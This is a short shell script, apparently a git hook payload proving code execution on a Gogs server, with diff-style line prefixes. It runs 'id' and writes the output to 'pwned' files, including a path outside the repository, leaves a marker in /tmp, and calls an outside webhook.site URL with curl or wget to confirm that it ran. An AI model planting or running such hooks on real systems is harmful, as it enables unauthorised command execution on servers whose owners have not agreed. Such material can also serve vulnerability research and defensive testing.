- #!/bin/sh
- id > ../../pwned 2>/dev/null
- id > pwned 2>/dev/null
- echo 'gogs-hook-ran' >> /tmp/gogs_140_1788533066
- curl -s 'https://webhook.site/99d7a43d-c0fe-4dcd-93fa-d2511a3d2e7e?id=gogs_140_1788533066' >/dev/null 2>&1 || wget -q -O /dev/null 'https://webhook.site/99d7a43d-c0fe-4dcd-93fa-d2511a3d2e7e?id=gogs_140_1788533066' 2>/dev/null
|